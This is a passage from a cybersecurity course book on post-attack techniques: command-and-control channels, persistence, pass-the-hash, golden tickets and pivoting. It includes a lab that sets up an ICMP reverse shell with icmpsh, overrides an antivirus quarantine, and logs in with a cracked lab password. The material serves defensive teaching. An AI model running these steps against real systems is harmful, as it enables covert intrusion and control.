cause harm to an organization by locking up systems, consuming bandwidth and system resources,
D
and flooding mail and other services on the network. Additionally, a DoS can be used to send data
designed to exploit known flaws in an application, thus opening the door for more malicious incidents.
or
e
at
lic
up
D
ot
N
o
D
Lesson 4: Analyzing Attacks on Computing and Network Environments |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

5 Analyzing Post-Attack
Techniques
e
ut
ib
tr
is
Lesson Introduction
D
After reconnaissance and attack, the last phase of the threat process is post-attack. In many
cases, an attacker won't just withdraw once their attack is done; on the contrary, they'll want
or
to stay in control of the systems they've compromised, continue to evade any
countermeasures, and cover their tracks to avoid being identified. All of this means that, if
you prematurely terminate your threat assessment efforts, they'll have gone to waste.
Instead, you need to hone your focus on what an attacker does after an attack that can inflict
e
long-lasting harm on your organization.
at
Lesson Objectives
lic

• Assess command and control techniques.
up
• Assess persistence techniques.

• Assess lateral movement and pivoting techniques.
D
• Assess data exfiltration techniques.

• Assess anti-forensics techniques.
ot
N
o
D

TOPIC A
Assess Command and Control Techniques
In this topic, you'll assess how attackers can continue to serve malicious software to victims through
a coordinated and highly connected network of servers and botnets.
e
Command and Control
ut
Command and Control In cybersecurity, command and control (C&C) refers to an infrastructure of computers with
Throughout this lesson, which attackers direct, distribute, and control malware. This is made possible primarily through
ib
consider pointing to coordinated botnets—after compromising systems and turning them into zombies, the attacker adds
specific Common these systems to an ever-growing pool of resources. The attacker then issues commands to the
Vulnerabilities and resources in this pool. A command can be a simple ping or heartbeat to verify that the bot is still
tr
Exposures (CVE), alive in the botnet—a process called beaconing—or the issued command can be more malicious
Common Weakness (for example, attempting to infect any computers the bot is connected to in a network).
is
Enumeration (CWE™),
and Common Attack C&C servers are difficult to pin down because they frequently change Domain Name System (DNS)
Pattern Enumeration names. Dynamic DNS registration helps attackers avoid detection, as does using many hosts in
D
and Classification issuing commands to the zombie computers. This is particularly problematic in organizations that
(CAPEC™) entries that have hundreds or even thousands of devices connected on a network. Each one is a potential attack
demonstrate the real- surface for a C&C operation to start with, and then the attack can spread exponentially throughout
world impact of these
attacks and their related
vulnerabilities. Some
examples are provided
without the organization even knowing.or
the organization. Most successful C&C operations manage to snare bots in a private network
e
for you in content
delivery tips.
at
lic
up
D
Figure 5-1: An attacker issuing commands to zombies in a private network.

ot
In issuing commands, the C&C server must find a channel to communicate over. The channels that
attackers use can vary, and each may have their own strengths and weaknesses. Examples of
N
channels include:
• Internet Relay Chat (IRC)
o
• HTTP/S
• DNS
D
• Internet Control Message Protocol (ICMP)

• Additional channels
Lesson 5: Analyzing Post-Attack Techniques | Topic A

Internet Relay Chat (IRC)

Internet Relay Chat (IRC) is a group communication protocol. IRC clients send messages to IRC Internet Relay Chat
servers, which then display these messages to every other client connected to a server. Although its (IRC)
primary use is group chatting, IRC also supports private messages and file sharing between clients.
IRC networks are divided into discrete channels, which are the individual forums used by clients to
chat.
IRC has been a popular channel for C&C communication for some time. This is due in large part to
the ease with which an attacker can set up an IRC server and begin sending interactive control
e
directives to individual bots connected to the IRC server. Other channels will generally require
ut
additional development and scaling to provide full control to the C&C server, but with IRC, it takes
very little effort. This is because IRC infrastructure supports a great deal of flexibility in the types of
commands that can be sent to a server by a client. For example, the C&C server could issue a
ib
command to its zombie IRC clients that forces them to download new malicious software. The
malware update propagates through the IRC clients quickly and easily.
Despite its popularity in years past, use of IRC as a C&C channel is on the decline, as is IRC use in
tr
general. IRC traffic is relatively easy for administrators to detect, and many organizations have no
use for this protocol, so they simply block all such communications. This has motivated C&C
is
operators to turn elsewhere for their communication needs, but some still maintain a significant and
harmful presence in IRC.
D
HTTP/S
or
Unlike IRC, communication over HTTP and HTTPS is still a necessity in almost every
organizational network, and blocking these protocols entirely is simply not feasible. Additionally, it's
difficult to separate malicious traffic from legitimate traffic, so attackers are finding these web-based
HTTP/S
e
protocols more viable channels for their C&C communications.
When used in C&C, HTTP/S servers are not as flexible as IRC. Out-of-the-box web servers don't
at
typically afford the C&C server much interactive control with its messages, so the server may need
to upload text files to multiple web servers as a way to communicate with its bots. The bot connects
lic
to one or more of these web servers to receive its orders from the text file. The text file may, as
before, instruct the bot to update its malicious software. The process is less streamlined than with
IRC, but attackers can still find success. If the attacker takes the time to program more interactivity
into the web server backend, they may be able to match IRC's full control capabilities.
up
Although administrators can take steps to mitigate HTTP/S C&C operations by blocking known
malicious domains, as explained before, attackers are able to change domains more quickly than
many administrators can keep up with.
D
DNS
ot
Another channel for C&C communication on the rise is the DNS protocol. Because DNS traffic is DNS
not inspected or filtered in most private networks, attackers see an opportunity for their control
N
messages to evade detection. Using DNS, attackers send their commands in either request or
response queries to bots that share usage of the same name servers or delegation path. This typically
makes the queries longer and more complicated than average, because the C&C directive needs to
o
fit with the DNS format. While this can be challenging, and certainly doesn't offer the same
flexibility as IRC, attackers are able to exploit organizations that don't continuously monitor their
D
name servers.
To evade detection when DNS servers are monitored, attackers break their control messages into
several different query chunks so as not to trip sensors that only look at individual transmissions.
Another sign of a C&C operation through DNS is when the same query gets repeated several times;
this indicates that the bot is checking into the control server for more orders.

DNS as a C&C channel is also effective because the bot doesn't even need to have a direct
connection to outside the network. All it needs to do is connect to a local DNS server that executes
lookups on authoritative servers outside the organization (like those on the Internet), and it can still
receive a response with a control message.
ICMP
ICMP Although not as common as other methods, C&C operations can use Internet Control Message
Protocol (ICMP) as their chosen communications channel. The bot can ping its C&C controller and
e
ask for orders, and the controller can respond with its commands. Each of these transmissions is
ut
done in a single ICMP packet. Because ICMP packets are relatively small and used primarily to
check the status of other hosts on a network, the most obvious C&C message to use is a simple
check to see if the bot is still active.
ib
Advanced messages like file transfers and remote shells are much more difficult to execute in ICMP
constraints, but may still be possible. This is not ideal for attackers who need a high degree of
tr
reliability in their operations, but some may use ICMP simply because it's not commonly thought of
as a vector for advanced C&C operations. However, there are plenty of reasons why an attacker may
not bother with ICMP. First, many organizations simply block inbound traffic on this protocol
is
because of its popular use in distributed denial of service (DDoS) attacks. Second, administrators
may set a baseline for ICMP packet sizes, and if they notice a packet size above or below the
D
baseline, it may trigger an alert. And third, ICMP packets are not encrypted, and monitoring services
can easily inspect them for abnormal contents.
Additional Channels
Additional Channels or
The following table lists some additional and custom channels that C&C operations can use.
e
C&C Channel Description
at
Social media websites Facebook, Twitter, and LinkedIn have all been vectors for C&C
operations. Social media platforms like these are a way for the attacker to
lic
blend in with the crowd, issuing commands through the platforms'

messaging functionality or their account profiles. For example, many
businesses implicitly trust LinkedIn. An attacker could set up an account
up
and issue commands to bots through the account's profile, using fields
like employment status, employment history, status updates, and more.
Similarly, there is evidence that a C&C operation used random Twitter
accounts to post seemingly random hashtags. These hashtags were
D
actually encoded, and bots would scour Twitter messages for these
hashtags to receive their orders. Over the years, social media sites have
gotten better at shutting down C&C operations.
ot
Media files Media file formats like JPEG, MP3, and MPEG use metadata to describe
images, audio, and video. This is especially prevalent in digital cameras,
N
which record characteristics like aperture and shutter speed in metadata.

An attacker could embed its control messages inside this metadata, and
then send the media file to its bots over any number of communication
o
channels that support media sharing. Because monitoring systems do not

typically look at media metadata, the attacker may be able to evade
D
detection.

C&C Channel Description

XML-based documents Modern Microsoft® Office documents use an XML-based file format.
Examples include DOCX, XLSX, and PPTX. This format decreases the
file size while enabling more functionality. However, because XML-based
documents are essentially compressed files, they can be embedded with
extraneous or malicious data. This data can hold the attacker's C&C
message, and like media metadata, most monitoring systems won't detect
them during transmission.
e
Peer-to-peer (P2P) Although most C&C networks have a centralized configuration, some
ut
networks attackers have seen value in decentralizing to more effectively evade
detection and shutdown. In most cases, the C&C server is a single point
of failure. Although this is mitigated somewhat by backups and dynamic
ib
DNS registration, it still poses a challenge for attackers. Therefore,
attackers use peers in a P2P network to distribute controllers among
many hosts. If one or a group of peers is taken down, the botnet may still
tr
be able to function, and C&C operations continue unabated. The major
downside for an attacker is that P2P networks are hard to establish.
is
Cloud services Cloud companies that provide a wide variety of services, especially
infrastructure and platform services, are also at risk of being C&C
D
vectors. For example, attackers used the Google App Engine™ platform
to send C&C messages to bots through a custom application hosted by
the service. App Engine is attractive to attackers because it offers free,
or
limited access to the service. Instead of incurring the cost of setting up
their own servers, attackers use a cloud company's reliable and scalable
infrastructure to support their C&C operations.
e
at
lic
up
D
ot
N
o
D

ACTIVITY 5-1
Assessing Command and Control Techniques
Data File
e
/home/kali/Desktop/icmpsh.zip
ut
C:\CNX0013Data\Analyzing Post-Attack Techniques\icmpsh.zip
Activity: Assessing
Command and Control Before You Begin
ib
Techniques
You'll be using your Kali Linux™ virtual machine (VM) as a controller, and your Windows Server®
as a bot. The program you'll use to initiate these C&C communications is called icmpsh.
tr
Scenario
is
You want to begin assessing how attackers may still compromise your machines even after the main
attack has concluded. In particular, attackers can turn your hosts into zombies they control, and use
D
them for a variety of malicious purposes. You're familiar with C&C over IRC, so you've taken
measures to block that protocol entirely. However, you want to see how a more common and
necessary channel can be used in C&C operations.
1. Extract the icmpsh tool.

or
e
a) Switch to your Kali Linux VM.
b) Right-click the icmpsh.zip file on the desktop and select Extract Here.
at
2. Start the icmpsh controller.

lic
a) Open a terminal window.

b) Enter cd ~/Desktop/icmpsh-master to navigate to the extracted directory.
c) Enter sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
up
d) Verify that the terminal responds with net.ip4.icmp echo_ignore_all = 1

D
ot
This command disables normal ICMP responses so the victim can more easily listen to commands
from the controller.
N
e) At the prompt, enter gcc icmpsh-m.c -o icmpsh-ctrl

This compiles the C source file into an executable.
f) Enter sudo ./icmpsh-ctrl
o
This starts the master system (controller) listening for the slave (bot) response.
D
3. Start your server listening as a bot.

a) Switch to your Windows Server and extract the icmpsh.zip file to C:\Temp.
b) Select the Windows Security pop-up that indicates that it found a malicious file.
c) In Windows Security, under the quarantined entry, select Severe, select Actions→Allow, then close
Windows Security.

d) Check C:\Temp\icmpsh-master and verify that icmpsh.exe is listed. If it isn't extract the icmpsh.zip
file again.
e) Return to your Kali Linux VM and open a second terminal, keeping the icmpsh terminal running.
f) At the prompt, enter ssh Administrator@10.39.5.# where # corresponds to your server's IP
address.
g) Enter the password you cracked earlier (Pa22w0rd).
h) At the SSH prompt, navigate to the server's C:\Temp\icmpsh-master directory.
i) Enter icmpsh -t 10.39.5.# where # corresponds to your Kali Linux VM's IP address.
j) Switch back to your original terminal window and verify that you can see the C:\Temp\icmpsh-
e
master prompt.
ut
ib
tr
is
4. Send commands from your controller to your bot and capture the traffic.
D
a) In Kali Linux, from the menu bar, select Applications→Sniffing & Spoofing→wireshark.
b) Start a capture on eth0.
c) Switch to the terminal with the icmpsh C:\Temp\icmpsh-master prompt and run some common
®
Windows commands such as dir, ipconfig, and arp -a.
d) Return to Wireshark and stop the capture. or
e) Add the following filter in Wireshark: icmp.type==8 && ip.len > 60
This filters the capture by ICMP echo requests with data payloads. These echo requests are coming
e
from your Windows Server.
at
f) Examine the captured packets and note the responses to your commands sent over ICMP.
lic
up
D
ot
Ask students if they

5. Why might this traffic bypass firewall and intrusion detection system/intrusion believe this could be a
viable way for a bot or
N
prevention system (IDS/IPS) controls? other malware to

A: Since many networks do not block outbound ICMP traffic, this type of C&C communication may communicate and send
successfully bypass such controls. data.
o
6. How might you stop this type of communication?

D
A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability to diagnose
network problems through ping and traceroute. Stateful filtering of this traffic will not be
useful, as there is no state to filter. Application-layer firewalls also tend to ignore ICMP. However,
packet inspectors may be able to review ICMP traffic for unusual behavior, such as the messages'
length or contents. The fact that Windows Security identified the bot executable as malicious is
promising, but it won't necessarily detect every possible payload.

7. What other methods of command and control could an attacker use to evade
your security?
A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are very
difficult to detect and stop because they blend into normal traffic.
8. Perform cleanup tasks.

a) Close Wireshark without saving.
b) Press Ctrl+C on both terminals to stop icmpsh.
e
c) At any terminal, enter sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0 to reset the
ICMP configuration.
ut
d) Close both terminals.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC B
Assess Persistence Techniques
In this topic, you'll assess how attackers can maintain access once they've breached a system or
network.
e
Advanced Persistent Threat (APT)
ut
An advanced persistent threat (APT) is a threat that continually exploits a target while remaining Advanced Persistent
undetected for a significant period of time. APTs typically target large organizations to covertly Threat (APT)
ib
compromise their business efforts. Financial institutions, companies in health care, and other CrowdStrike (https://
organizations that store massive quantities of personally identifiable information (PII) are the most www.crowdstrike.com)
common victims of an APT. APTs have also targeted governments to carry out political objectives and FireEye (https://
tr
or simply as a way to spy on another country. Most APTs are usually not individual attackers, but a www.fireeye.com/) are
group of highly technical people that work toward a clearly defined goal. two online services that
is
compile information
The "advanced" part of an APT is an important identifier, as these types of threats are very rarely about known APT
executed by lone, unskilled attackers using pre-baked exploits. Instead, APTs spend considerable groups. Consider
D
effort in gathering intelligence on their target, and are able to craft highly specific custom exploits demonstrating them.
that even cybersecurity professionals may have a difficult time detecting. Another characteristic of
the advanced nature of APTs is that they often combine many different attack elements into an
overall threat architecture.
or
There are several possible use cases for an APT, but since a large part of the attack is about stealth,
most APTs are interested in maintaining access to networks and systems. There are several
e
techniques that can grant attackers access for months or even years on end without being detected.
Because of this, APTs are some of the most insidious and harmful threats to an organization.
at
Rootkits
lic
Rootkits, because they work at such a low level on a compromised host and are adept at concealing Rootkits
malicious code, are a staple of APTs. The power of rootkits is they can alter an operating system's
up
kernel or a device's firmware to mask just about any type of activity desired. For example, they can
take over the core parts of an OS to hide running processes, services, or files from security
mechanisms like anti-malware and intrusion detection systems (IDSs). In this sense, the rootkit isn't
executing the direct attack, but simply makes way for other malicious code to run undetected. A
D
Trojan horse by itself may be instantly identified by a real-time anti-malware scanner because it can't
change the OS's fundamental behavior. A rootkit installed beforehand, however, has complete
access to the lowest levels of the OS and can manipulate it into hiding the Trojan from the scanner.
ot
Aside from Trojan horse malware, APTs use rootkits to hide keyloggers, malicious drivers, botnet
controllers, and backdoors. They often rely on convincing privileged users to install the software on
N
their computers through social engineering tactics.

Rootkits present a challenge to security personnel because they make the lowest level of software
untrusted. You can't be entirely certain a rootkit is gone if you use the very OS it compromised to
o
scan for it. Some software programs can detect known rootkit signatures, but these are not always
adequate solutions.
D
Lesson 5: Analyzing Post-Attack Techniques | Topic B

e
ut
ib
tr
is
D
or
e
Figure 5-2: Anti-malware software detecting a rootkit.
at
More on Keylogging
lic
Keyloggers can use rootkits as a persistence vector, but some software-based keyloggers are a
component of more surface-level malware like worms and viruses. There are also hardware-based
keylogging tools that can enable an attacker to extract a user's keystrokes. These are often
implemented as a small device plugged into a host's interface, such as a USB port. These devices
up
incorporate a microcontroller that listens on the data stream between keyboard and CPU, and stores
captured keystrokes on the device's memory chip. For an attacker, a hardware keylogger has the
advantage of bypassing the OS and firmware and capturing all keystrokes when the computer is
D
powered on. A hardware keylogger may be easy to spot during an inspection of the physical
computer, but it can also blend into the physical environment and be difficult for an everyday user
to notice.
ot
Backdoors
N
Backdoors A backdoor is a way for an attacker to bypass authentication methods to gain access to a system.
Backdoors are commonly enabled as part of rootkit behavior—the rootkit hides a running process
o
that grants a remote attacker access to the operating system. Software backdoors are usually just
remote control software that opens a channel for the attacker to execute commands through. Using
D
this channel, the attacker can take advantage of the rootkit's elevated privileges and concealment to
establish an access point that is hard to detect, much less remove.
APTs will typically install backdoors as part of the attack process, only to truly leverage their
potential during the post-attack process, when the organization feels it has successfully recovered
from the incident. A successful APT will use the access afforded by the backdoor sparingly; even if
the computer itself can't detect the backdoor because of a rootkit, users and security professionals

may notice odd behavior that could tip them off. Unexplained slow network speeds and missing or
altered files/configurations are usually the signs of stealth access.
Software is not the only backdoor vector that APTs can take. There have been several initiatives by
vendors and governments to install backdoors into the manufacturing phase of hardware
development. These backdoors enable someone with secret knowledge of them to access any
hardware platform that has that particular backdoor. If an APT is able to obtain this knowledge, it
could conceivably have unlimited access to a device even when that device's software has been
wiped clean. This is very difficult for security professionals to counter, as they are typically not given
backdoor access to the hardware they buy, which can put the APT at a major advantage.
e
ut
Logic Bombs
An APT can automate its post-attack processes by installing logic bombs on a target system. This is Logic Bombs
ib
useful to the APT because nothing suspicious will happen until the right condition is met, especially
if the logic bomb is concealed by a rootkit. So while indiscreet use of a backdoor can make a user
tr
suspicious, an effective logic bomb will not.
Logic bombs are typically triggered at a certain time or due to a certain event, whichever the APT
is
configures. An APT can use a logic bomb as a method of misdirection—after an attack, the incident
responders may not consider the incident fully eradicated until they carefully monitor the affected
systems for several months after the attack. After no further activity is detected, the responders
D
consider the incident closed. However, the logic bomb is still set to go off in the future, and lies
dormant on the compromised systems until that date comes.
or
APTs can use logic bombs with any number of payloads. They can simply make the payload a
backdoor, or it can have a more immediate and devastating effect. For example, the logic bomb
could wipe an entire drive's worth of sensitive company data, triggering when a specific employee
logs in. This not only accomplishes the APT's goal of data destruction, but it can also frame that
e
particular employee as the perpetrator.
at
Rogue Accounts
lic
Rather than taking the malicious software route, an APT may want to actively try to avoid anti- Rogue Accounts
malware scanners as part of its post-attack process. Rogue accounts present an opportunity for the Example CVE ID:
APT to maintain access while injecting no illegitimate code on the target systems at all. The CVE-2013-3612.
up
compromised account is trusted by the operating system in accordance with the privileges it has
assigned. On a system with hundreds, or maybe thousands of accounts, any one account can easily
get lost in the shuffle.
D
With this rogue account in place, the attacker may be able to remote into the system and access
sensitive information. If the rogue account has sufficient privileges, the APT may be able to change
or delete files. As long as the target system is up and running, and remote protocols are active, the
ot
APT can gain access at any time it chooses.

How the APT creates or hijacks the rogue account may determine its level of access. If the attackers
can socially engineer a privileged user into giving their account credentials, the APT doesn't need to
N
use these credentials directly. After all, even if the user is tricked into giving them out, the user will
still probably watch the account for whatever it is the social engineer has promised would happen
(e.g., in a quid pro quo). Instead, the APT could use these credentials to create a new account or
o
modify an existing one, give that account a certain amount of privileges, and then let it stay dormant
D
until it's needed. The pitfall for the APT is that most organizations log account creation and use on
critical hosts, and an alert could be generated by this activity.

ACTIVITY 5-2
Assessing Persistence Techniques
Scenario
e
Activity: Assessing You and your team are concerned about possible hidden malware on your client machines left over
Persistence Techniques from an attack. This malware can stealthily wreak havoc on your systems, and is difficult for even
ut
standard anti-malware solutions to detect. So, you'll take steps to identify any persistent malicious
software on your systems.
ib
1. One of your colleagues suggests using typical anti-malware software like
tr
Windows Security to scan for rootkits.
Why might this approach not be 100% effective?
is
A: Answers may vary, but rootkits infect a device at its lowest levels, including being able to alter the
fundamental behavior of the operating system itself. Therefore you cannot always trust an anti-
D
malware scan that's running on the operating system to accurately detect a rootkit.
2. From an attacker's perspective, what advantages does using a rogue account

or
for persistent access have over using backdoors?
A: Answers may vary, but rogue accounts, unlike backdoors, do not require malicious software to be
installed on the target device. There just needs to be an account configured on the device that has
e
the desired level of access. This helps the attacker evade both manual and automatic anti-
malware sweeps.
at
If necessary, remind
students of the different 3. What does the threat profile of a successful APT usually look like?
lic
components of a threat
profile: actor type, A: Answers may vary, but APTs are usually launched by multiple experienced cybercriminals, state-
motivation, intent, target, sponsored hackers, or other skilled attackers because of the difficulty in remaining stealthy for
vector, and technique long periods of time. There are many potential motives behind APTs, including a desire for money
up
criteria. and association with a larger group. Likewise, the intent of an APT can vary, though it often
centers on theft, espionage, or denial of service.
D
ot
N
o
D

TOPIC C
Assess Lateral Movement and Pivoting
Techniques
In this topic, you'll assess how attackers can move deeper into your network and systems after
e
they've launched the first salvo of their attack.
ut
Lateral Movement
ib
Lateral movement is the process by which an attacker is able to move from one part of a Lateral Movement
computing environment to another. Rather than target the deepest parts of an environment Example CAPEC ID:
immediately, the attacker can gain entry to a more easily accessible endpoint at the perimeter. From CAPEC-564.
tr
there, they can move laterally to different systems without arousing suspicion. Lateral movement can
therefore be used as part of an APT, in that the attackers can go from one point to another without
is
tripping any alerts. This is because effective lateral movement is often indistinguishable from
legitimate traffic—the attacker does not necessarily direct their attack at specific targets, but
D
stealthily spreads out through the environment, testing various systems for their potential as a
vector.
There are several techniques that can enable lateral movement, the most necessary of which is
or
reconnaissance. Once the attacker compromises their patient zero host, they'll need to sweep the
network for other hosts, as well as enumerate network protocols, ports, and logical mapping. This
provides them with the information they need to discover where exactly they are, and where exactly
they can move to. From there, they have several different options available to gain access further
e
into the organization's network and systems.
at
lic
up
D
ot
N
o
D
Figure 5-3: An attacker starts at a compromised host and moves to other hosts in the network.
Lesson 5: Analyzing Post-Attack Techniques | Topic C

Pass the Hash

Pass the Hash (2 Slides) Attackers can extend their lateral movement by a great deal if they are able to compromise host
If necessary, remind credentials. One common credential exploit technique for lateral movement is called pass the hash.
students of the Kerberos This is the process of taking an account's cached credentials when the user is logged in to a single
process. sign-on (SSO) system so the attacker can use the credentials on other systems. An example of the
process is as follows:
1. The victim logs in to their Windows computer that is part of a domain using Kerberos SSO
authentication. Rather than requiring the victim to enter their password over and over, the SSO
e
authentication caches their credentials as a hash in the Security Accounts Manager (SAM)
ut
database on their computer.
2. The attacker gains administrative access to the victim's computer and dumps the SAM database,
exposing the hash of the victim's password. In this case, "dumping" the SAM database means to
ib
extract the hashes from it using a tool like pwdump, as the SAM database cannot be read
directly.
3. The attacker loads this hash onto other computers in the network and authenticates to the SSO
tr
system, impersonating the victim.
is
D
or
e
at
lic
up
Figure 5-4: The pass the hash process.

D
The attacker doesn't even need to crack the hashes—they use them directly to authenticate, making
it much easier for them to compromise hosts in the organization. The attacker's access isn't just
ot
limited to a single host, as they can pass the hash onto just about any computer in the network that
is tied to the domain. This drastically cuts down on the effort the attacker must spend in moving
from host to host.
N
Windows Defender Credential Guard

Windows Defender Credential Guard is a feature of Windows 10, Windows Server 2016, and
o
Windows Server 2019 that significantly reduces the efficacy of pass the hash attacks. It uses
virtualization techniques to prevent users, even privileged ones, from reading credential data (e.g.,
D
hashes) stored in memory. Only a new, isolated process on the system is allowed access to this
credential data.

Golden Ticket
A golden ticket, or ticket-granting ticket (TGT), is a Kerberos ticket that has the ability to grant Golden Ticket (2 Slides)
other tickets in an Active Directory environment. Attackers who are able to create a golden ticket The term "golden ticket"
can use it to grant administrative access to other domain members, even to domain controllers. This is usually used to refer
can potentially enable an attacker to compromise the organization's entire forest. to a forged ticket-
granting ticket (TGT)
Attackers create golden tickets by gaining access to the krbtgt hash, typically by dumping the rather than a TGT used
Active Directory® (AD) data store. The krbtgt is the trust anchor of the Active Directory domain, for its intended purpose.
fulfilling a similar role as the private key of a root certificate authority. The krbtgt generates TGTs
e
that enable users to access services with Kerberos. With this compromised, the attacker essentially
ut
has total control over a domain. An example of the golden ticket attack process is as follows:
1. An attacker gains access to the NTDS.DIT file that contains the Active Directory data store.
2. The attacker dumps the NTDS and identifies the hashes of various administrator accounts, as
ib
well as the krbtgt.
3. The incident response team detects the breach and forces Active Directory users to reset their
tr
passwords, but they don't reset the krbtgt.
4. The attacker, using the still valid krbtgt hash, uses an exploit module to create a golden ticket
is
for a user in the administrator group. The user doesn't even need to exist in the directory.
5. The attacker uses the golden ticket to assume an administrative identity and compromise the
domain controller (DC). From there, the user opens a shell onto the DC and executes any
D
administrator-level command they choose.
or
e
at
lic
up
D
ot
N
Figure 5-5: The golden ticket attack process.
A golden ticket attack can enable an attacker to move across an entire forest after the main attack
o
has concluded. Even if the incident response team detects the main attack and contains it, the
organization is still susceptible to lateral movement within its various domains.
D
Remote Access Services

Remote access services are a significant part of the lateral movement process. In order to hop from Remote Access
one host to another, the attacker opens a connection between the hosts that provides some measure Services
of control. The protocols and services available to an attacker will influence how they move within a
network. For example, an older protocol like Telnet may limit how much control the attacker has on

the remote host they're targeting. Protocols like this also need to be installed and enabled on the
target machine to function properly. Windows systems, for instance, do not come with Telnet
installed.
Aside from simple remote shells like Telnet, attackers may also use graphical remote desktop
protocols when available. Protocols like Windows Remote Desktop and Remote Assistance can
provide the attacker with access to a target machine from the perspective of a normal, everyday user.
Like Telnet, these protocols need to be enabled on the target machine first, which can hamper the
attacker's movement. However, when it comes to user workstations, remote desktop services are
much more commonly used than command-line shells, so there's a greater likelihood that these
e
services will be enabled and allowed at the firewall.
ut
As you'll see, not all remote access services need to be overtly enabled on the target computer to
work.
ib
tr
is
D
or
e
at
lic
up
D
Figure 5-6: Accessing a remote server using Windows Remote Desktop.
WMIC
ot
WMIC The Windows Management Instrumentation Command-line (WMIC) tool provides users with
N
a terminal interface into the operating system's WMI. WMI obtains management information and
notifications from both local and remote computers, and enables administrators to run scripts to
manage those computers. The latter function is actually WMI's most commonly used—
o
administrators write scripts in a language like VBScript to manage remote hosts over a network. For
example, administrators can automate starting and stopping processes on a remote machine.
D
Although the admin could log in to Remote Desktop to start and stop the processes manually, the
automated script streamlines this task.
Note: WMI uses the Common Information Model (CIM), an industry standard that defines how
devices, applications, and other computer components are represented as related objects.
Because of its ability to manage remote hosts, WMIC can be a vector in post-attack lateral
movement. With one host compromised, the attacker can open a channel on other hosts by starting

certain processes or stopping processes that interfere with their attack. Using WMIC, the attacker
can also assume the identity of another user if they know that user's credentials. This can help the
attacker perform tasks that require a higher level of privileges than the default given.
e
ut
Figure 5-7: Using WMIC to open a network share on a remote server.
ib
Aside from direct control, the attacker can also obtain crucial reconnaissance from a remote host
using WMIC. Everything from processes to drive partitions to BIOS data, and more, is information
WMI can obtain on the user's behalf.
tr
PsExec
is
PsExec was developed as an alternative to Telnet and other such remote access services. Whereas PsExec
D
Telnet and similar services require the user sets up and installs the service on the remote machine,
PsExec is designed to be a quicker, more out-of-the-box approach to remote access. Executing the
PsExec program from the local machine is all that is required. PsExec also provides more advanced
or
features, such as enabling the administrator to authenticate to remote systems with multiple
credentials, rather than just their own. Because it's simple to set up and offers powerful features,
PsExec is often favored by administrators looking to quickly manage a remote system.
e
Likewise, for the same reasons, it's also a popular vector for post-attack movement. For example,
assume an attacker has user credentials on their target system, but can't directly access the command
at
line or any GUI interface on the remote machine. In order to move laterally to that machine, they'll
need to find some way to open their target up to attack. Using PsExec, they can use a malicious file
lic
on their local machine (which they've already compromised), and run that file on the remote
machine they're targeting. If this malicious file opens a backdoor, then they can now elevate their
privileges and directly control the target system.
up
D
ot
N
Figure 5-8: Using PsExec to run a malicious file on a remote computer that opens port 1111 on
the firewall.
o
Attackers can also use the -s option in PsExec to start processes using the built-in Windows
D
SYSTEM account. The SYSTEM account has complete access to the operating system, even more
so than an administrator.
Note: The "Ps" in PsExec refers to the Unix command ps, which lists process information.

Pivoting
Pivoting Pivoting is a process similar to lateral movement. In lateral movement, an attacker hops from one
host to another in search of vulnerabilities to exploit. When an attacker pivots, they compromise
one host (the pivot) that enables them to spread to other hosts that would otherwise be inaccessible.
For example, if you are able to open a shell on a host, you can enter commands in that shell to see
other network subnets the host might be connected to. The attacker can move to a different
network segment than the one they're already using to connect to the host.
e
Note: Despite the distinction, lateral movement and pivoting are often used interchangeably.
ut
Port Forwarding One use for pivoting is port forwarding. In port forwarding, the attacker uses a host as a pivot and
is able to access one of its open TCP/IP ports. The attacker then forwards traffic from this port to a
ib
port of a host on a different subnet using pivoting methods.
For example, assume the attacker's host (Host A) has compromised another host in the network,
tr
Host B. Host B is not their ultimate destination; they want to take control of Host C, which they
can't reach directly from their attack machine (perhaps because it's blocked by a firewall). Host B,
however, can reach Host C. The attacker knows Host C has Windows Remote Desktop enabled, and
is
wants to exploit that. So:
1. The attacker opens an exploit shell onto Host B and forwards port 3389 to Host C.
D
2. The attacker then uses their attack machine to connect to Remote Desktop at localhost:3389,
which gets forwarded to and opens a remote session on Host C, their ultimate target.
or
e
at
lic
up
D
ot
N
Figure 5-9: An illustration of the port forwarding example.

o
VPN Pivoting
D
VPN Pivoting (2 Slides) One type of pivoting attack involves VPN communications. If the attacker is able to compromise a
host inside a private network, they can run an exploit payload on that host that starts a VPN client
on its network interface. Meanwhile, the attacker runs a VPN server outside the network, and relays
frames of data from that server to the client. The data frames are dumped onto the client and can
now interface with the wider private network. Any traffic that the client (pivot host) sees can then
be relayed back to the attacker's VPN server.

The actual composition of these data frames can vary, but attackers commonly use VPN pivoting to
perform reconnaissance of the target network. Once they've established their virtual connection
from attacking host to pivot target, the attacker can scan the private network for vulnerabilities and
enumerate hosts using the compromised pivot machine. This exposes the network to any number of
continued attacks, and the attacker may be able to pivot to mission-critical hosts like a domain
controller.
e
ut
ib
tr
is
D
or
e
at
Figure 5-10: Using a VPN to pivot from a compromised host to a domain controller.
lic
SSH Pivoting
After an attacker compromises a host, they can also pivot to other hosts using Secure Shell (SSH) SSH Pivoting (2 Slides)
tunnels. The attacker connects to the compromised pivot through SSH using the -D flag. This flag
up
sets up a local proxy server on the attacker's machine, as well as enables port forwarding.
Connections to this proxy on the port specified are forwarded to the ultimate target through the
pivot. For example, the attacker sets up the proxy on Host A using port 8080. They then SSH into
D
Host B (the pivot), and any traffic sent through port 8080 is forwarded to port 8080 on Host C (the
ultimate target).
SSH pivoting enables an attacker to compromise a host they can't reach directly by using an
ot
intermediary host (the pivot). The attacker can craft an exploit package to take ownership of the
unreachable host. Additionally, the attacker can chain proxy servers together to continue pivoting
from host to host, until they reach a DC or another mission-critical host.
N
o
D

e
ut
ib
Figure 5-11: The firewall blocks direct access to Host C, but the attacker uses SSH to make Host
tr
B a pivot.
is
Routing Tables and Pivoting
D
Routing Tables and After opening a shell on the pivot host, the attacker can also add a new route to the pivot host's
Pivoting routing table. This new route includes a destination subnet and a gateway. The attacker defines the
gateway as their own exploit session, so any traffic sent to the subnet must tunnel through the
or
attacker's session. This can enable an attacker to use the pivot as a way to reach different subnets.
For example, the attacker's Host A and the compromised pivot (Host B) may be on the
192.168.10.0/24 subnet, whereas the attacker's ultimate target (Host C) is on the 10.39.5.0/24
subnet. The attacker can't see Host C from Host A. Host B, however, can see Host C. If the attacker
e
